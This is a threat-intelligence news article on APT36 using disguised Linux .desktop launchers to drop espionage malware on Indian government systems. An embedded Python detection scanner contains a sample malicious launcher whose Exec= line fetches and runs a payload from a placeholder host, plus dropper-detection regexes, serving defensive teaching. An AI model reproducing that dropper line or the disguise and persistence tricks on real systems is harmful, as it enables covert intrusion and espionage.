The Pakistani cyber-espionage group known as APT36 is back in action, and this time it's targeting Linux systems using .desktop files as a vehicle to deploy malware. According to new reports from CYFIRMA and CloudSEK, these attacks are primarily aimed at government and defense sector organizations in India.
The goal is clear: to steal sensitive information and maintain persistent access for espionage activities. This is not the first time APT36 has used this technique; they had previously employed .desktop files in past campaigns across South Asia for similar purposes.
The malicious activity was first detected on August 1, 2025, and evidence suggests the attacks are still ongoing.
How Are APT36 Hackers Abusing .desktop Files on Linux?
Although CYFIRMA and CloudSEK describe different variants of the attack (with varying infrastructures and malware samples), both agree on the essentials: APT36's techniques, tactics, and objectives are nearly identical.
It all starts with a classic social engineering tactic: a phishing email sent to the victim with a ZIP file attachment. Inside the compressed file is a supposed PDF document—but in reality, it's a malicious .desktop file cleverly disguised with a misleading name and icon.
On Linux, .desktop files are application launchers—small text files that tell the desktop environment how to run an application and how the shortcut should appear. APT36 has cleverly exploited this functionality to inject their malicious code.
What Happens When the Victim Opens the File?
Believing it's a harmless PDF, the victim double-clicks the file. But what actually happens is that a hidden Bash command embedded in the file’s Exec= field is executed.
That command:
- Creates a temporary file in the /tmp/ directory.
- Downloads a hex-encoded payload, either from a server controlled by the attackers or directly from Google Drive.
- Writes the payload to the temporary file.
- Grants it execution permissions using chmod +x.
- And finally, executes it in the background, compromising the system.
APT36 doesn’t stop there. To avoid raising suspicion, the script also launches Firefox and opens a decoy PDF hosted on Google Drive. This way, the user believes they’ve simply opened the expected document—unaware that their system is now infected.
Sample of a Decoy PDF Used in the Attacks (Source: CloudSEK)
Techniques to Hide Execution and Ensure Persistence on Linux
In addition to using the Exec= field to run commands in the background, the attackers got creative and added a few more tricks to the .desktop file. For instance, they included the line Terminal=false to prevent any visible terminal window from opening—helping to keep the victim from suspecting that something unusual is happening.
They also added X-GNOME-Autostart-enabled=true, which causes the file to run automatically every time the user logs in. In other words, the malware ensures it remains active even after a system reboot, maintaining access without raising any alarms.
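As an added example (not code from the article or from either vendor's report), the following Python scanner parses a .desktop launcher and flags the combination of traits described above: an Exec= line that hands off to a shell and stages a download in /tmp, a document-like Name, Terminal=false paired with that shell, and the X-GNOME-Autostart-enabled flag. The two launchers embedded in it are constructed samples, the domain is a placeholder, and the indicator names and regexes are this example's own choices.

```python
import re

# Constructed sample shaped like the launcher the article describes (a "PDF" whose
# Exec= runs a hidden bash dropper, hides the terminal, re-runs at login); placeholder domain.
SUSPICIOUS_DESKTOP = """[Desktop Entry]
Type=Application
Name=Meeting_Notes.pdf
Terminal=false
X-GNOME-Autostart-enabled=true
Exec=bash -c "curl -s https://attacker.invalid/p -o /tmp/.svc; chmod +x /tmp/.svc; /tmp/.svc & firefox https://drive.google.com/decoy"
"""
# Constructed benign launcher: Terminal=false alone is normal for GUI apps.
BENIGN_DESKTOP = "[Desktop Entry]\nType=Application\nName=Text Editor\nTerminal=false\nExec=gedit %U\n"

SHELL_RE = re.compile(r"\b(?:ba)?sh\s+-c\b")                          # Exec hands off to a shell
DROPPER_RE = re.compile(r"\b(?:curl|wget)\b.*(?:chmod\s+\+x|/tmp/)")  # fetch and stage in /tmp
DOC_NAME_RE = re.compile(r"\.(?:pdf|docx?|xlsx?|pptx?)$")             # named like a document

def parse_desktop(text):
    """Return the key/value pairs of the [Desktop Entry] group as a dict."""
    entry, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):                  # group header
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry

# Indicators are weak alone (Terminal=false is normal for GUI apps); the verdict counts them.
RULES = [
    ("exec_spawns_shell", lambda e: bool(SHELL_RE.search(e.get("Exec", "")))),
    ("exec_downloads_to_tmp", lambda e: bool(DROPPER_RE.search(e.get("Exec", "")))),
    ("document_name_disguise", lambda e: bool(DOC_NAME_RE.search(e.get("Name", "").lower()))),
    ("terminal_hidden_for_shell", lambda e: e.get("Terminal", "").lower() == "false"
     and bool(SHELL_RE.search(e.get("Exec", "")))),
    ("autostart_on_login", lambda e: e.get("X-GNOME-Autostart-enabled", "").lower() == "true"),
]

def scan_desktop(text):
    """Return the names of every indicator triggered by a .desktop file's text."""
    entry = parse_desktop(text)
    return [name for name, check in RULES if check(entry)]

def is_suspicious(text, threshold=2):
    return len(scan_desktop(text)) >= threshold   # several weak signs together
```

Pointing this at ~/.config/autostart and ~/Downloads is enough to catch the pattern described here; a single hit such as a launcher merely named like a document stays below the threshold.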
Malicious Desktop File (Source: CloudSEK)
.desktop Files: From Innocent Shortcuts to Espionage Tools
In Linux environments, .desktop files are simple text-based shortcuts. Their primary function is to define things like an application's name, icon, and the command that runs when the user clicks on it. They are a common part of the desktop environment and generally don’t raise any red flags.
But APT36 has found a way to turn this basic functionality into a powerful attack vector. Instead of using .desktop files as legitimate shortcuts, the attackers transform them into droppers (malware loaders) and persistence mechanisms—very similar to how .LNK shortcuts are exploited in Windows.
And here’s the most concerning part: since these files are plain text and not binary executables, and because their abuse isn’t widely documented, many Linux security solutions don’t flag them as threats. It’s the perfect disguise.
What Does the Malware Downloaded by These Files Do?
The malicious .desktop file ultimately drops an ELF executable (the typical format in Linux) written in Go, specifically designed for espionage activities. Although the code is obfuscated and packed to hinder analysis, researchers uncovered several interesting capabilities:
- It can be configured to operate in stealth mode.
- It attempts to maintain persistence on its own, using methods such as cron jobs or systemd services—both common for managing scheduled tasks and system services in Linux.
- It communicates with its command-and-control (C2) server via a bidirectional WebSocket channel, which not only allows for the exfiltration of sensitive data but also enables real-time command execution from the attacker.
Overview of the Attack (Source: CloudSEK)
A Clear Sign of Evolution in APT36
According to experts from CYFIRMA and CloudSEK, this campaign marks a significant leap in APT36’s sophistication. The group is now employing more evasive tactics, more refined techniques, and increasingly creative ways to exploit legitimate system features for malicious purposes.
In short, it’s no longer just about tricking the user with a bait file—it’s about establishing a silent, persistent, and hard-to-detect presence on the system. This poses a real threat even to Linux users, who have traditionally considered the platform more secure.